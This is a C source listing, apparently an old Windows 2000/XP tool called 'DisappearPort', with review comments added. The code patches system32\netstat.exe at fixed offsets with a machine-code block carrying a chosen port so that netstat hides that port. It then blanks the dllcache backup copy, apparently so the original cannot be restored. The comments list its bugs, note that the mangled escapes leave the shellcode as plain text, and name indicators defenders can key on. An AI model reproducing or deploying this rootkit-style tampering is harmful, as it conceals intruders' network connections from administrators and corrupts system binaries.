关于端口隐藏

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define taille 28432
#define offprelude 9859
#define offcode 11298

/*
 * Entry point of "DisappearPort" (as the banner below calls it).
 *
 * What the code visibly does: reads %systemroot%\system32\netstat.exe
 * (taille = 28432 bytes) into memory, checks a 7-byte marker at file
 * offset 8720, splices the port string given in argv[1] into code[],
 * overwrites the file at offsets offprelude (10 bytes) and offcode
 * (58 bytes), rewrites netstat.exe, and finally reopens the copy under
 * system32\dllcache for writing and closes it without writing anything.
 *
 * NOTE(review): every escape on this page is written with '/' instead
 * of '\' ("/xE8", "/n", "//system32"), which looks like a transcription
 * artefact of the listing; as written, prelude[] and code[] are plain
 * text of that length, not the byte values the names suggest.
 *
 * Indicators a defender can key on are all visible here: netstat.exe
 * modified in place at fixed offsets, and a zero-length
 * system32\dllcache\netstat.exe left behind (see the last freopen/fclose).
 */
int main (int argc, char *argv[]) {

int i;
/* 6 bytes, but the space-padding loop below touches port[0..6]
 * (seven indices) -- the last write is one past the end. */
char port[6];
/* Receives 7 bytes from buff and is never NUL-terminated before the
 * strcmp() below reads it as a string. */
char version[7];
char *netstat;
/* Whole-file image; only the first `taille` bytes are ever read. */
char buff[taille];
/* Not checked for NULL before strcpy(); a missing variable crashes here. */
char *env=getenv ("systemroot");
FILE *nethnd;

/* 10 escapes; written verbatim to buff[offprelude .. offprelude+9]. */
char prelude[]="/xE8/x9A/x05/x00/x00/x75/x03/xEB/x5B/x90";

/* 58 escapes; code[22..24] and code[35..38] are replaced by the
 * (space-padded) port text before the block is written at offcode. */
char code[]="/x8B/x5D/xFC/x51/xB9/x00/x00/x00/x00/x41/x80/x3C/x0B"
            "/x3A/x75/xF9/x8B/x34/x0B/x81/xFE/x3A/x20/x20/x20/x75"
            "/x14/x83/xC1/x04/x8B/x34/x0B/x81/xFE/x20/x20/x20/x20"
            "/x75/x06/x59/x33/xDB/x33/xF6/xC3/x59/x33/xDB/x33/xF6"
            "/xA9/x66/x06/x00/x00/xC3";

printf ("----------------------------------------------/n");
printf ("DisappearPort v1.1 for win2k/XP, Code by LinFodUnEt/n");
printf ("----------------------------------------------/n/n");


/* argc is ignored; argv[argc] is NULL by the C standard, so this works
 * only because argv[1] is the terminator when no argument is given. */
if (!argv[1]) {
printf ("/nUsage : %s <Port of Disappear>/n",argv[0]);
exit(0);
}

/* strncpy() with n == sizeof port: a 6+ character argument leaves
 * port[] without a terminator. */
strncpy (port,argv[1],6);

/* Turn every NUL into a space so the port is right-padded with 0x20;
 * after this loop port[] has no terminator at all, so the "%s" in the
 * final printf reads beyond the array.  i < 7 also writes port[6]. */
for ( i=0 ; i < 7 ; i++)
 if (port[i] == 0x00) port[i]=0x20;

/* sizeof(env) is the size of a pointer, not strlen(env): the buffer is
 * sizeof(char *) + 34 bytes regardless of how long %systemroot% is.
 * The sprintf() further down writes strlen(env) + 33 + 1 bytes into it. */
netstat = malloc (sizeof(env) + 34);
strcpy (netstat,env);
strcat (netstat,"//system32//netstat.exe");

nethnd = fopen (netstat,"rb");

if (nethnd  == NULL) {
printf ("Impossbible d'ouvrir netstat.exe/n");
exit(0);
}

/* Return value unchecked: a shorter file leaves the tail of buff[]
 * uninitialised, and it is still written back below. */
fread (buff,1,taille,nethnd);

/* 7-byte marker at file offset 8720 used as a "right build" check. */
for (i=0; i<7 ; i++)
version[i]=buff[8720+i];

/* version[] is not NUL-terminated, so strcmp() compares past its end;
 * the comparison only works when buff[8727] happens to be 0 (or the
 * byte after version[] in memory is). */
if (strcmp(version,"tTHt0Ht") != 0) {
printf ("/n/nNo Rootkit in here. Disappear Failed!/n");
exit(0);
}

/* Splice the padded port text into the code block: first 3 chars at
 * code[22..24], remaining 4 at code[35..38]. */
for ( i=0 ; i < 3 ; i++)
 code[22+i] = port[i];

for ( i=0 ; i < 4 ; i++)
 code[35+i] = port[3+i];

/* Patch the in-memory image at the two fixed offsets. */
for ( i=0 ; i < 10 ; i++)
 buff[offprelude+i]=prelude[i];

for (i=0 ; i < 58 ; i++)
 buff[offcode+i]=code[i];

/* "wb" truncates netstat.exe and the whole image is written back;
 * neither freopen() nor fwrite() is checked. */
nethnd = freopen (netstat,"wb",nethnd);
fwrite (buff,1,taille,nethnd);

/* Heap overflow: see the malloc() size comment above. */
sprintf (netstat,"%s//system32//dllcache//netstat.exe",env);

/* Opened for writing and closed with nothing written, which leaves the
 * dllcache copy as an empty file -- presumably so it cannot be used to
 * restore the original; not verifiable from this listing. */
nethnd = freopen (netstat,"wb",nethnd);
fclose (nethnd);

/* port[] is unterminated here (see the padding loop). */
printf ("/nDisappear Successed!,Disappear Port is %s/n",port);

/* netstat (malloc'd) is never freed; harmless at process exit. */
return(0);
}
